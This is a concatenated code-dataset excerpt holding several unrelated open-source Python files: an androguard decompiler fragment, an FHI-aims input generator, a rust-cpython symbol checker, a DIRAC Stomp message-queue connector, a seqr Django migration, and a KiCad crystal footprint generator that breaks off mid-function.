loc_ins.extend(self.cond2.get_loc_with_ins())
return loc_ins
def visit(self, visitor):
return visitor.visit_short_circuit_condition(self.isnot, self.isand,
self.cond1, self.cond2)
def __str__(self):
if self.isnot:
ret = '!%s %s %s'
else:
ret = '%s %s %s'
return ret % (self.cond1, ['||', '&&'][self.isand], self.cond2)
class ShortCircuitBlock(CondBlock):
def __init__(self, name, cond):
super(ShortCircuitBlock, self).__init__(name, None)
self.cond = cond
def get_ins(self):
return self.cond.get_ins()
def get_loc_with_ins(self):
return self.cond.get_loc_with_ins()
def neg(self):
self.cond.neg()
def visit_cond(self, visitor):
return self.cond.visit(visitor)
def __str__(self):
return '%d-SC(%s)' % (self.num, self.cond)
class LoopBlock(CondBlock):
def __init__(self, name, cond):
super(LoopBlock, self).__init__(name, None)
self.cond = cond
def get_ins(self):
return self.cond.get_ins()
def neg(self):
self.cond.neg()
def get_loc_with_ins(self):
return self.cond.get_loc_with_ins()
def visit(self, visitor):
return visitor.visit_loop_node(self)
def visit_cond(self, visitor):
return self.cond.visit_cond(visitor)
def update_attribute_with(self, n_map):
super(LoopBlock, self).update_attribute_with(n_map)
self.cond.update_attribute_with(n_map)
def __str__(self):
if self.looptype.pretest():
if self.false in self.loop_nodes:
return '%d-While(!%s)[%s]' % (self.num, self.name, self.cond)
return '%d-While(%s)[%s]' % (self.num, self.name, self.cond)
elif self.looptype.posttest():
return '%d-DoWhile(%s)[%s]' % (self.num, self.name, self.cond)
elif self.looptype.endless():
return '%d-WhileTrue(%s)[%s]' % (self.num, self.name, self.cond)
return '%dWhileNoType(%s)' % (self.num, self.name)
class TryBlock(BasicBlock):
def __init__(self, name, block_ins):
super(TryBlock, self).__init__(name, block_ins)
self.catch = []
def add_catch(self, node):
self.catch.append(node)
def __str__(self):
return 'Try(%s)' % self.name
class CatchBlock(BasicBlock):
def __init__(self, name, block_ins, typeh):
super(CatchBlock, self).__init__(name, block_ins)
self.exception_type = typeh
def __str__(self):
return 'Catch(%s)' % self.name
class GenInvokeRetName(object):
def __init__(self):
self.num = 0
self.ret = None
def new(self):
self.num += 1
self.ret = Variable('tmp%d' % self.num)
return self.ret
def set_to(self, ret):
self.ret = ret
def last(self):
return self.ret
def build_node_from_block(block, vmap, gen_ret):
ins, lins = None, []
idx = block.get_start()
for ins in block.get_instructions():
opcode = ins.get_op_value()
if opcode == 0x1f: # check-cast
idx += ins.get_length()
continue
_ins = INSTRUCTION_SET.get(ins.get_name().lower())
if _ins is None:
logger.error('Unknown instruction : %s.', ins.get_name().lower())
# fill-array-data
if opcode == 0x26:
fillaray = block.get_special_ins(idx)
lins.append(_ins(ins, vmap, fillaray))
# invoke-kind[/range]
elif (0x6e <= opcode <= 0x72 or 0x74 <= opcode <= 0x78):
lins.append(_ins(ins, vmap, gen_ret))
# filled-new-array[/range]
elif 0x24 <= opcode <= 0x25:
lins.append(_ins(ins, vmap, gen_ret.new()))
# move-result*
elif 0xa <= opcode <= 0xc:
lins.append(_ins(ins, vmap, gen_ret.last()))
# monitor-{enter,exit}
elif 0x1d <= opcode <= 0x1e:
idx += ins.get_length()
continue
else:
lins.append(_ins(ins, vmap))
idx += ins.get_length()
name = block.get_name()
# return*
if 0xe <= opcode <= 0x11:
node = ReturnBlock(name, lins)
node.set_return()
# {packed,sparse}-switch
elif 0x2b <= opcode <= 0x2c:
idx -= ins.get_length()
values = block.get_special_ins(idx)
node = SwitchBlock(name, values, lins)
node.set_switch()
# if-test[z]
elif 0x32 <= opcode <= 0x3d:
node = CondBlock(name, lins)
node.set_cond()
node.off_last_ins = ins.get_ref_off()
# throw
elif opcode == 0x27:
node = ThrowBlock(name, lins)
node.set_throw()
else:
# goto*
if 0x28 <= opcode <= 0x2a:
lins.pop()
node = StatementBlock(name, lins)
node.set_stmt()
return node
|
JulianSchuette/android-instrumentation
|
injector/androguard/decompiler/dad/basic_blocks.py
|
Python
|
apache-2.0
| 10,398
|
[
"VisIt"
] |
d5ddc309a585951d768aed2cd0a8ba13d98b9897f5ef24cbf65f6891fd806f33
|
from django.template import Template
from django.template import Context
from django.conf import settings
import os
import json
import itertools
from collections import namedtuple
import time
import math
from functools import partial
settings.configure()  # minimal settings so Django templates work outside a project
variables = json.load(open("variables.json"))
template = Template(open("control.template").read())
class Variable:
def __init__(self, name, value):
self.name = name
self.value = value
def __str__(self):
return self.name + "=" + str(self.value)
combinations = []
for var in variables["iterables"]:
values = []
for value in var["values"]:
values.append(Variable(var["name"], value))
combinations.append(values)
def nextOddInteger(num):
ceil = math.ceil(num)
return ceil if ceil % 2 == 1 else ceil +1
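# e.g. (math.ceil returns a float under Python 2):
#   nextOddInteger(4.2) -> 5.0
#   nextOddInteger(6)   -> 7.0
#   nextOddInteger(5.0) -> 5.0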
def atomLine(arr):
return "atom\t" + "\t".join(map(str, arr[0:3])) + " " + arr[3]
def cordByPos(pos, atoms):
return atoms[pos]
def average(atoms, cordNum):
return mean(map(partial(cordByPos, cordNum), atoms))
def origin(atoms):
return map(partial(average, atoms), [0, 1, 2])
def mean(arr):
l = len(arr)
return float(sum(arr)) / l if l > 0 else float('nan')
def subtract(pair):
return pair[0] - pair[1]
def square(x):
return x * x
def distance(originCords, atomCords):
diffs = map(subtract, zip(atomCords, originCords))
return math.sqrt(sum(map(square, diffs)))
def maxDistance(origin, atoms):
return max(map(partial(distance, origin), atoms))
def constant(name):
return next(const["value"] for const in variables["constants"] if const["name"] == name)
def cubeOutput(num):
return "output cube eigenstate {0}\ncube filename eigen{0}.cube".format(num)
def cubeOutputs(num):
return "\n".join(map(cubeOutput, range(1, num + 1)))
atoms = variables["atoms"]
originCords = map(lambda x: round(x, 3), origin(atoms))
cube_origin = " ".join(map(str, originCords))
voxel_size = constant("voxel_size")
cube_edge = nextOddInteger(maxDistance(originCords, atoms) * 2 / voxel_size)
cube_outputs = cubeOutputs(constant("eigen_cubes_number"))
geometry = "\n".join(map(atomLine, atoms))
for comb in itertools.product(*combinations):
directory = "-".join(map(str, comb))
if not os.path.exists(directory):
os.makedirs(directory)
# create a context for a template
dic = dict([(str(x.name), x.value) for x in comb])
for constant in variables["constants"]:
dic[constant["name"]] = constant["value"]
dic["cube_origin"] = cube_origin
dic["cube_edge"] = cube_edge
dic["cube_outputs"] = cube_outputs
context = Context(dic)
# render a template in a control file
open(directory + "/control.in", "w").write(template.render(context))
# output a generated geometry into a geometry file
open(directory + "/geometry.in", "w").write(geometry)
os.chdir(directory)
start = time.time()
print "Executing FHI-AIMS on " + directory + "..."
os.system("/home/john/Desktop/FHI-AIMS/aims_110113/bin/aims.110113.mpi.x > output.out")
print "Executed FHI-AIMS on " + directory + " in " + str(time.time() - start) + " secs"
os.chdir("..")
|
Tulane/FHI-AIMS-input-generator
|
generator.py
|
Python
|
mit
| 3,071
|
[
"FHI-aims"
] |
1f05ef482ef5a7f4a3fc7524a36eefbbe4a72c5c288d3d82610e198487f141e3
|
#!/usr/bin/env python
import sysconfig
import subprocess
import json
import os
import sys
import platform
if os.path.dirname(__file__):
os.chdir(os.path.dirname(__file__))
if platform.system() == 'Windows' or platform.system().startswith('CYGWIN'):
sys.exit(0) # test not supported on windows - ignore it
so_files = [
sysconfig.get_config_var("LIBDIR")+"/"+sysconfig.get_config_var("LDLIBRARY"),
sysconfig.get_config_var("LIBPL")+"/"+sysconfig.get_config_var("LDLIBRARY")
]
so_file = None
for name in so_files:
if os.path.isfile(name):
so_file = name
if not so_file:
print('Could not find %r' % so_files)
sys.exit(1)
so_symbols = set()
for line in subprocess.check_output(['readelf', '-Ws', so_file]).splitlines():
if line:
so_symbols.add(line.decode('utf-8').split()[-1])
assert 'PyList_Type' in so_symbols
assert 'PyList_New' in so_symbols
cfgs = []
if sys.version_info.major == 3:
sys_lib = 'python3-sys'
for i in range(4, sys.version_info.minor+1):
cfgs += ['--cfg', 'Py_3_{}'.format(i)]
else:
sys_lib = 'python27-sys'
interesting_config_flags = [
"Py_USING_UNICODE",
"Py_UNICODE_WIDE",
"WITH_THREAD",
"Py_DEBUG",
"Py_REF_DEBUG",
"Py_TRACE_REFS",
"COUNT_ALLOCS"
]
for name in interesting_config_flags:
if sysconfig.get_config_var(name):
cfgs += ['--cfg', 'py_sys_config="{}"'.format(name)]
interesting_config_values = ['Py_UNICODE_SIZE']
for name in interesting_config_values:
cfgs += ['--cfg', 'py_sys_config="{}_{}"'.format(name, sysconfig.get_config_var(name))]
json_output = subprocess.check_output(['rustc', '-Z', 'ast-json', '../{}/src/lib.rs'.format(sys_lib)] + cfgs)
doc = json.loads(json_output.decode('utf-8'))
foreign_symbols = set()
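# Walk the rustc AST JSON: any Static or Fn item found inside an extern
# block (a ForeignMod node) is a symbol the Rust bindings expect the Python
# shared library to export.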
def visit(node, foreign):
if isinstance(node, dict):
node_node = node.get('node', None)
if isinstance(node_node, dict) and node_node.get('variant') in ('Static', 'Fn') and foreign:
foreign_symbols.add(node['ident'])
if isinstance(node_node, dict) and node_node.get('variant') == 'ForeignMod':
foreign = True
for v in node.values():
visit(v, foreign)
elif isinstance(node, list):
for v in node:
visit(v, foreign)
elif isinstance(node, (int, type(u''), bool, type(None))):
pass
else:
raise Exception('Unsupported node type {}'.format(type(node)))
visit(doc, foreign=False)
assert 'PyList_Type' in foreign_symbols, "Failed getting statics from rustc -Z ast-json"
assert 'PyList_New' in foreign_symbols, "Failed getting functions from rustc -Z ast-json"
names = sorted(foreign_symbols - so_symbols)
if names:
print('Symbols missing in {}:'.format(so_file))
print('\n'.join(names))
sys.exit(1)
else:
print('Symbols in {} OK.'.format(so_file))
|
naufraghi/rust-cpython
|
tests/check_symbols.py
|
Python
|
mit
| 2,847
|
[
"VisIt"
] |
140608331a017f4e8e06e1469b5e4650e1e688b674273a49d5a9c122d9603858
|
"""
Class for management of Stomp MQ connections, e.g. RabbitMQ
"""
import json
import random
import os
import socket
import ssl
import time
import stomp
from DIRAC.Resources.MessageQueue.MQConnector import MQConnector
from DIRAC.Core.Security import Locations
from DIRAC import S_OK, S_ERROR, gLogger
from DIRAC.Core.Utilities.DErrno import EMQUKN, EMQCONN
class StompMQConnector(MQConnector):
"""
Class for management of message queue connections
Allows to both send and receive messages from a queue
"""
# Setting for the reconnection handling by stomp interface.
# See e.g. the description of Transport class in
# https://github.com/jasonrbriggs/stomp.py/blob/master/stomp/transport.py
RECONNECT_SLEEP_INITIAL = 1 # [s] Initial delay before reattempting to establish a connection.
  RECONNECT_SLEEP_INCREASE = 0.5  # Factor by which the sleep delay is increased; 0.5 means increase by 50%.
  RECONNECT_SLEEP_MAX = 120  # [s] The maximum delay that can be reached independent of increasing procedure.
  RECONNECT_SLEEP_JITTER = 0.1  # Random factor to add. 0.1 means a random number from 0 to 10% of the current delay.
RECONNECT_ATTEMPTS_MAX = 1e4 # Maximum attempts to reconnect.
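  # Worked example (paraphrasing stomp.py's back-off; exact behaviour may vary by version):
  # the n-th reconnection attempt sleeps roughly
  #   min(RECONNECT_SLEEP_MAX, RECONNECT_SLEEP_INITIAL * (1 + RECONNECT_SLEEP_INCREASE) ** n)
  # plus up to RECONNECT_SLEEP_JITTER * sleep of random jitter,
  # i.e. about 1 s, 1.5 s, 2.25 s, ... capped at 120 s with the defaults above.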
PORT = 61613
def __init__(self, parameters=None):
""" Standard constructor
"""
super(StompMQConnector, self).__init__()
self.log = gLogger.getSubLogger(self.__class__.__name__)
self.connections = {}
if 'DIRAC_DEBUG_STOMP' in os.environ:
gLogger.enableLogsFromExternalLibs()
def setupConnection(self, parameters=None):
"""
Establishes a new connection to a Stomp server, e.g. RabbitMQ
Args:
parameters(dict): dictionary with additional MQ parameters if any.
Returns:
S_OK/S_ERROR
"""
if parameters is not None:
self.parameters.update(parameters)
# Check that the minimum set of parameters is present
    if not all(p in self.parameters for p in ('Host', 'VHost')):
return S_ERROR('Input parameters are missing!')
reconnectSleepInitial = self.parameters.get('ReconnectSleepInitial', StompMQConnector.RECONNECT_SLEEP_INITIAL)
reconnectSleepIncrease = self.parameters.get('ReconnectSleepIncrease', StompMQConnector.RECONNECT_SLEEP_INCREASE)
reconnectSleepMax = self.parameters.get('ReconnectSleepMax', StompMQConnector.RECONNECT_SLEEP_MAX)
reconnectSleepJitter = self.parameters.get('ReconnectSleepJitter', StompMQConnector.RECONNECT_SLEEP_JITTER)
reconnectAttemptsMax = self.parameters.get('ReconnectAttemptsMax', StompMQConnector.RECONNECT_ATTEMPTS_MAX)
host = self.parameters.get('Host')
port = self.parameters.get('Port', StompMQConnector.PORT)
vhost = self.parameters.get('VHost')
sslVersion = self.parameters.get('SSLVersion')
hostcert = self.parameters.get('HostCertificate')
hostkey = self.parameters.get('HostKey')
connectionArgs = {'vhost': vhost,
'keepalive': True,
'reconnect_sleep_initial': reconnectSleepInitial,
'reconnect_sleep_increase': reconnectSleepIncrease,
'reconnect_sleep_max': reconnectSleepMax,
'reconnect_sleep_jitter': reconnectSleepJitter,
'reconnect_attempts_max': reconnectAttemptsMax}
# We use ssl credentials and not user-password.
if sslVersion is not None:
if sslVersion == 'TLSv1':
sslVersion = ssl.PROTOCOL_TLSv1
# get local key and certificate if not available via configuration
if not (hostcert or hostkey):
paths = Locations.getHostCertificateAndKeyLocation()
if not paths:
return S_ERROR('Could not find a certificate!')
hostcert = paths[0]
hostkey = paths[1]
connectionArgs.update({
'use_ssl': True,
'ssl_version': sslVersion,
'ssl_key_file': hostkey,
'ssl_cert_file': hostcert})
else:
return S_ERROR(EMQCONN, 'Invalid SSL version provided: %s' % sslVersion)
try:
      # Get the IP addresses of the brokers, ignoring the first two returned values (hostname and alias list).
_, _, ip_addresses = socket.gethostbyname_ex(host)
self.log.info('Broker name resolved', 'to %s IP(s)' % len(ip_addresses))
for ip in ip_addresses:
connectionArgs.update({'host_and_ports': [(ip, int(port))]})
self.log.debug("Connection args: %s" % str(connectionArgs))
self.connections[ip] = stomp.Connection(**connectionArgs)
except Exception as e:
return S_ERROR(EMQCONN, 'Failed to setup connection: %s' % e)
return S_OK('Setup successful')
def reconnect(self):
res = self.connect(self.parameters)
if not res:
return S_ERROR(EMQCONN, "Failed to reconnect")
return S_OK('Reconnection successful')
def put(self, message, parameters=None):
"""
Sends a message to the queue
message contains the body of the message
Args:
message(str): string or any json encodable structure.
parameters(dict): parameters with 'destination' key defined.
"""
destination = parameters.get('destination', '')
error = False
# Randomize the brokers to spread the load
randConn = self.connections.values()
random.shuffle(randConn)
for connection in randConn:
try:
if isinstance(message, (list, set, tuple)):
for msg in message:
connection.send(body=json.dumps(msg), destination=destination)
error = False
break
else:
connection.send(body=json.dumps(message), destination=destination)
error = False
break
except Exception as e:
error = e
if error is not False:
return S_ERROR(EMQUKN, 'Failed to send message: %s' % error)
return S_OK('Message sent successfully')
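  # Minimal usage sketch (host and destination below are made-up placeholders,
  # not a real DIRAC-configured setup):
  #   connector = StompMQConnector()
  #   connector.setupConnection({'Host': 'mq.example.org', 'VHost': '/'})
  #   connector.connect()
  #   connector.put({'key': 'value'}, {'destination': '/queue/test'})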
def connect(self, parameters=None):
host = self.parameters.get('Host')
port = self.parameters.get('Port')
user = self.parameters.get('User')
password = self.parameters.get('Password')
connected = False
for ip, connection in self.connections.iteritems():
try:
listener = connection.get_listener('ReconnectListener')
if listener is None:
listener = ReconnectListener(self.reconnect)
connection.set_listener('ReconnectListener', listener)
connection.start()
connection.connect(username=user, passcode=password)
time.sleep(1)
if connection.is_connected():
self.log.info("Connected to %s:%s" % (ip, port))
connected = True
except Exception as e:
self.log.error('Failed to connect: %s' % e)
if not connected:
return S_ERROR(EMQCONN, "Failed to connect to %s" % host)
return S_OK("Connected to %s" % host)
def disconnect(self, parameters=None):
"""
Disconnects from the message queue server
"""
fail = False
for connection in self.connections.itervalues():
try:
if connection.get_listener('ReconnectListener'):
connection.remove_listener('ReconnectListener')
connection.disconnect()
except Exception as e:
self.log.error('Failed to disconnect: %s' % e)
fail = True
if fail:
return S_ERROR(EMQUKN, 'Failed to disconnect from at least one broker')
return S_OK('Successfully disconnected from all brokers')
def subscribe(self, parameters=None):
mId = parameters.get('messengerId', '')
callback = parameters.get('callback', None)
dest = parameters.get('destination', '')
headers = {}
if self.parameters.get('Persistent', '').lower() in ['true', 'yes', '1']:
headers = {'persistent': 'true'}
ack = 'auto'
acknowledgement = False
if self.parameters.get('Acknowledgement', '').lower() in ['true', 'yes', '1']:
acknowledgement = True
ack = 'client-individual'
if not callback:
self.log.error("No callback specified!")
fail = False
for connection in self.connections.itervalues():
try:
listener = StompListener(callback, acknowledgement, connection, mId)
connection.set_listener('StompListener', listener)
connection.subscribe(destination=dest,
id=mId,
ack=ack,
headers=headers)
except Exception as e:
self.log.error('Failed to subscribe: %s' % e)
fail = True
if fail:
return S_ERROR(EMQUKN, 'Failed to subscribe to at least one broker')
return S_OK('Subscription successful')
def unsubscribe(self, parameters):
dest = parameters.get('destination', '')
mId = parameters.get('messengerId', '')
fail = False
for connection in self.connections.itervalues():
try:
connection.unsubscribe(destination=dest, id=mId)
except Exception as e:
self.log.error('Failed to unsubscribe: %s' % e)
fail = True
if fail:
return S_ERROR(EMQUKN, 'Failed to unsubscribe from at least one destination')
return S_OK('Successfully unsubscribed from all destinations')
class ReconnectListener (stomp.ConnectionListener):
"""
Internal listener class responsible for reconnecting in case of disconnection.
"""
def __init__(self, callback=None):
"""
Initializes the internal listener object
Args:
callback: a function called when disconnection happens.
"""
self.log = gLogger.getSubLogger('ReconnectListener')
self.callback = callback
def on_disconnected(self):
""" Callback function called after disconnecting from broker.
"""
self.log.warn('Disconnected from broker')
try:
if self.callback:
self.callback()
except Exception as e:
self.log.error("Unexpected error while calling reconnect callback: %s" % e)
class StompListener (stomp.ConnectionListener):
"""
Internal listener class responsible for handling new messages and errors.
"""
def __init__(self, callback, ack, connection, messengerId):
"""
Initializes the internal listener object
Args:
callback: a defaultCallback compatible function.
      ack(bool): if set to true an acknowledgement will be sent back to the sender.
messengerId(str): messenger identifier sent with acknowledgement messages.
"""
self.log = gLogger.getSubLogger('StompListener')
if not callback:
      self.log.error('Error initializing StompMQConnector! Callback is None')
self.callback = callback
self.ack = ack
self.mId = messengerId
self.connection = connection
def on_message(self, headers, body):
"""
Function called upon receiving a message
Args:
headers(dict): message headers.
body(json): message body.
"""
result = self.callback(headers, json.loads(body))
if self.ack:
if result['OK']:
self.connection.ack(headers['message-id'], self.mId)
else:
self.connection.nack(headers['message-id'], self.mId)
def on_error(self, headers, message):
""" Function called when an error happens
Args:
headers(dict): message headers.
      message(str): error message body.
"""
self.log.error(message)
|
andresailer/DIRAC
|
Resources/MessageQueue/StompMQConnector.py
|
Python
|
gpl-3.0
| 11,290
|
[
"DIRAC"
] |
b47c30a3c61db130e2c72a2d880aa99d97b790b6a2fad43437971ad323ff8ff3
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11 on 2018-06-03 13:09
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('seqr', '0039_merge_20180531_1604'),
]
operations = [
migrations.AddField(
model_name='project',
name='genome_version',
field=models.CharField(choices=[(b'37', b'GRCh37'), (b'38', b'GRCh38')], default=b'37', max_length=5),
),
migrations.AddField(
model_name='sample',
name='dataset_file_path',
field=models.TextField(blank=True, db_index=True, null=True),
),
migrations.AddField(
model_name='sample',
name='dataset_name',
field=models.TextField(blank=True, null=True),
),
migrations.AddField(
model_name='sample',
name='dataset_type',
field=models.CharField(blank=True, choices=[(b'ALIGN', b'Alignment'), (b'VARIANTS', b'Variant Calls'), (b'SV', b'SV Calls'), (b'BREAK', b'Breakpoints'), (b'SPLICE', b'Splice Junction Calls'), (b'ASE', b'Allele Specific Expression')], max_length=20, null=True),
),
migrations.AddField(
model_name='sample',
name='elasticsearch_index',
field=models.TextField(blank=True, db_index=True, null=True),
),
migrations.AddField(
model_name='sample',
name='loaded_date',
field=models.DateTimeField(blank=True, null=True),
),
migrations.AlterField(
model_name='sample',
name='sample_status',
field=models.CharField(blank=True, choices=[(b'seq', b'In Sequencing'), (b'seq_done', b'Completed Sequencing'), (b'seq_fail_1', b'Failed Sequencing - Abandoned'), (b'loading', b'Loading'), (b'loaded', b'Loaded')], db_index=True, max_length=20, null=True),
),
migrations.AlterField(
model_name='sample',
name='sample_type',
field=models.CharField(blank=True, choices=[(b'WES', b'Exome'), (b'WGS', b'Whole Genome'), (b'RNA', b'RNA'), (b'ARRAY', b'ARRAY')], max_length=20, null=True),
),
migrations.RemoveField(
model_name='dataset',
name='created_by',
),
migrations.RemoveField(
model_name='dataset',
name='project',
),
migrations.RemoveField(
model_name='dataset',
name='samples',
),
migrations.RemoveField(
model_name='sample',
name='deprecated_base_project',
),
migrations.RemoveField(
model_name='sample',
name='is_external_data',
),
migrations.DeleteModel(
name='Dataset',
),
]
|
macarthur-lab/xbrowse
|
seqr/migrations/0040_auto_20180603_1309.py
|
Python
|
agpl-3.0
| 2,879
|
[
"ASE"
] |
3e7280977657a7af5a0da287fc82f5879b47ecc431d480b119b9de2911924088
|
#!/usr/bin/env python
import sys
import os
import math
# ensure that the kicad-footprint-generator directory is available
#sys.path.append(os.environ.get('KIFOOTPRINTGENERATOR')) # enable package import from parent directory
#sys.path.append("D:\hardware\KiCAD\kicad-footprint-generator") # enable package import from parent directory
sys.path.append(os.path.join(sys.path[0],"..","..","kicad_mod")) # load kicad_mod path
sys.path.append(os.path.join(sys.path[0],"..","..")) # load kicad_mod path
from KicadModTree import * # NOQA
from drawing_tools import *
def makeSMDCrystalAndHand(footprint_name, addSizeFootprintName, pins, pad_sep_x, pad_sep_y, pad, pack_width,
pack_height, pack_bevel, hasAdhesive=False, adhesivePos=[0, 0], adhesiveSize=1, style="rect",
description="Crystal SMD SMT", tags=[], lib_name="Crystals", offset3d=[0, 0, 0],
scale3d=[1, 1, 1], rotate3d=[0, 0, 0]):
makeSMDCrystal(footprint_name, addSizeFootprintName, pins, pad_sep_x, pad_sep_y, pad, pack_width,
pack_height, pack_bevel, hasAdhesive, adhesivePos, adhesiveSize, style,
description, tags, lib_name, offset3d, scale3d, rotate3d)
hsfactorx = 1.75
hsfactory = 1
if (pins == 2 and pack_width > pad_sep_x + pad[0]):
hsfactorx = 1
hsfactory = 1.75
elif (pins == 4 and pack_width < pad_sep_x + pad[0] and pack_height < pad_sep_y + pad[1]):
hsfactorx = 1.5
hsfactory = 1.5
elif (pins == 4 and pack_width > pad_sep_x + pad[0] and pack_height < pad_sep_y + pad[1]):
hsfactorx = 1.1
hsfactory = 1.5
elif (pins == 4 and pack_width < pad_sep_x + pad[0] and pack_height > pad_sep_y + pad[1]):
hsfactorx = 1.5
hsfactory = 1.1
makeSMDCrystal(footprint_name, addSizeFootprintName, pins, pad_sep_x + pad[0] * (hsfactorx - 1),
pad_sep_y + pad[1] * (hsfactory - 1), [pad[0] * hsfactorx, pad[1] * hsfactory], pack_width,
pack_height, pack_bevel, hasAdhesive, adhesivePos, adhesiveSize, style,
description + ", hand-soldering", tags + " hand-soldering", lib_name, offset3d, scale3d, rotate3d,
name_addition="_HandSoldering")
#
# <----------pad_sep_x------------->
# <----------pack_width-------------->
# #=============# #=============#
# | 4 | | 3 |
# | +----------------------------------+ | ^ ^
# | | | | | | | |
# #=============# #=============# | |
# | | | |
# | | pack_height |
# | | | pad_sep_y
# | | | |
# #=============# #=============# | ^ |
# | | | | | | | | |
# | +----------------------------------+ | v | v
# | 1 | | 2 | pad[1]
# #=============# #=============# v
# <---pad[0]---->
#
#
# pins=2,4
# style="rect"/"hc49"/"dip"
def makeSMDCrystal(footprint_name, addSizeFootprintName, pins, pad_sep_x, pad_sep_y, pad, pack_width, pack_height,
pack_bevel, hasAdhesive=False, adhesivePos=[0, 0], adhesiveSize=1, style="rect",
description="Crystal SMD SMT", tags=[], lib_name="Crystals", offset3d=[0, 0, 0], scale3d=[1, 1, 1],
rotate3d=[0, 0, 0], name_addition=""):
fpname = footprint_name
if addSizeFootprintName:
fpname += "-{2}pin_{0:2.1f}x{1:2.1f}mm".format(pack_width, pack_height, pins)
fpname = fpname + name_addition
overpad_height = pad_sep_y + pad[1]
overpad_width = pad_sep_x + pad[0]
if pins == 3:
overpad_height = pad_sep_y * 2 + pad[1]
overpad_width = pad_sep_x * 2 + pad[0]
betweenpads_x_slk = pad_sep_x - pad[0] - 2 * slk_offset
betweenpads_y_slk = pad_sep_y - pad[1] - 2 * slk_offset
overpads_x_slk = pad_sep_x + pad[0] + 2 * slk_offset
overpads_y_slk = pad_sep_y + pad[1] + 2 * slk_offset
if pins == 3:
overpads_x_slk = pad_sep_x * 2 + pad[0] + 2 * slk_offset
overpads_y_slk = pad_sep_y * 2 + pad[1] + 2 * slk_offset
elif pins == 6:
overpads_x_slk = pad_sep_x * 2 + pad[0] + 2 * slk_offset
dip_size = 1
mark_size = max(1.5*pack_bevel,1)
upright_mark = False
while pack_height < 2 * mark_size or pack_width < 2 * mark_size:
mark_size = mark_size / 2
if pack_bevel > 0 and math.fabs(mark_size / pack_bevel) > 0.7 and math.fabs(mark_size / pack_bevel) < 1.3:
upright_mark = True
h_fab = pack_height
w_fab = pack_width
l_fab = -w_fab / 2
t_fab = -h_fab / 2
r_fab = pack_width / 10
h_slk = h_fab + 2 * slk_offset
w_slk = w_fab + 2 * slk_offset
l_slk = l_fab - slk_offset
t_slk = t_fab - slk_offset
dip_size_slk = dip_size
mark_l_slk = -overpads_x_slk / 2
if math.fabs(l_slk - mark_l_slk) < 2 * lw_slk:
mark_l_slk = l_slk - 2 * lw_slk
mark_b_slk = overpads_y_slk / 2
if math.fabs(t_slk + h_slk - mark_b_slk) < 2 * lw_slk:
mark_b_slk = t_slk + h_slk + 2 * lw_slk
w_crt = max(overpad_width, pack_width) + 2 * crt_offset
h_crt = max(overpad_height, pack_height) + 2 * crt_offset
l_crt = -w_crt / 2
t_crt = -h_crt / 2
print(fpname)
desc = description + ", {0:2.1f}x{1:2.1f}mm^2 package".format(pack_width, pack_height)
tag_s = tags + " {0:2.1f}x{1:2.1f}mm^2 package".format(pack_width, pack_height)
# init kicad footprint
kicad_mod = Footprint(fpname)
kicad_mod.setDescription(desc)
    kicad_mod.setTags(tag_s)
    # anchor for SMD-symbols is in the center, for THT-symbols at pin1
kicad_mod.setAttribute('smd')
offset = [0, 0]
kicad_modg = kicad_mod
# set general values
kicad_modg.append(
Text(type='reference', text='REF**', at=[0, min(t_slk, -overpad_height / 2, -pack_height / 2) - txt_offset],
layer='F.SilkS'))
# kicad_modg.append(Text(type='user', text='%R', at=[0, min(t_slk,-overpad_height/2,-pack_height/2)-txt_offset], layer='F.Fab'))
kicad_modg.append(
Text(type='value', text=fpname, at=[0, max(t_slk + h_slk, overpad_height / 2, pack_height / 2) + txt_offset],
layer='F.Fab'))
# create FAB-layer
if style == 'hc49':
THTQuartzRect(kicad_modg, [l_fab, t_fab], [w_fab, h_fab], [w_fab * 0.9, h_fab * 0.9], 'F.Fab', lw_fab)
elif style == 'dip':
DIPRectL(kicad_modg, [l_fab, t_fab], [w_fab, h_fab], 'F.Fab', lw_fab, dip_size)
elif style == 'rect1bevel':
bevelRectBL(kicad_modg, [l_fab, t_fab], [w_fab, h_fab], 'F.Fab', lw_fab, dip_size)
else:
allBevelRect(kicad_modg, [l_fab, t_fab], [w_fab, h_fab], 'F.Fab', lw_fab, pack_bevel)
if upright_mark:
kicad_modg.append(Line(start=[l_fab + max(mark_size, pack_bevel), t_fab],
end=[l_fab + max(mark_size, pack_bevel), t_fab + h_fab], layer='F.Fab',
width=lw_fab))
else:
kicad_modg.append(
Line(start=[l_fab, t_fab + h_fab - mark_size], end=[l_fab + mark_size, t_fab + h_fab], layer='F.Fab',
width=lw_fab))
# create SILKSCREEN-layer
if pins == 2:
if pack_height < pad[1]:
kicad_modg.append(
Line(start=[-betweenpads_x_slk / 2, t_slk], end=[betweenpads_x_slk / 2, t_slk], layer='F.SilkS',
width=lw_slk))
kicad_modg.append(
Line(start=[-betweenpads_x_slk / 2, t_slk + h_slk], end=[betweenpads_x_slk / 2, t_slk + h_slk],
layer='F.SilkS', width=lw_slk))
# pin1 mark
kicad_modg.append(Line(start=[min(l_slk, -overpads_x_slk / 2), -pad[1] / 2],
end=[min(l_slk, -overpads_x_slk / 2), pad[1] / 2], layer='F.SilkS', width=lw_slk))
else:
kicad_modg.append(PolygoneLine(polygone=[[l_slk + w_slk, t_slk],
[-overpads_x_slk / 2, t_slk],
[-overpads_x_slk / 2, t_slk + h_slk],
[l_slk + w_slk, t_slk + h_slk], ], layer='F.SilkS', width=lw_slk))
elif pins == 3:
if (pack_height < overpad_height and pack_width > overpad_width):
kicad_modg.append(PolygoneLine(polygone=[[overpads_x_slk / 2, t_slk],
[l_slk + w_slk, t_slk],
[l_slk + w_slk, t_slk + h_slk],
[overpads_x_slk / 2, t_slk + h_slk]], layer='F.SilkS',
width=lw_slk))
kicad_modg.append(Line(start=[l_slk - 2 * lw_slk, t_slk],
end=[l_slk - 2 * lw_slk, t_slk + h_slk], layer='F.SilkS', width=lw_slk))
kicad_modg.append(PolygoneLine(polygone=[[-overpads_x_slk / 2, mark_b_slk],
[-overpads_x_slk / 2, t_slk + h_slk],
[l_slk, t_slk + h_slk],
[l_slk, t_slk],
[-overpads_x_slk / 2, t_slk]], layer='F.SilkS',
width=lw_slk))
else:
kicad_modg.append(PolygoneLine(polygone=[[-overpads_x_slk / 2, -overpads_y_slk / 2],
[-overpads_x_slk / 2, overpads_y_slk / 2],
[overpads_x_slk / 2, overpads_y_slk / 2]], layer='F.SilkS',
width=lw_slk))
elif pins >= 4:
if (betweenpads_y_slk < 5 * lw_slk or betweenpads_x_slk < 5 * lw_slk) and (pack_height < overpad_height and pack_width < overpad_width):
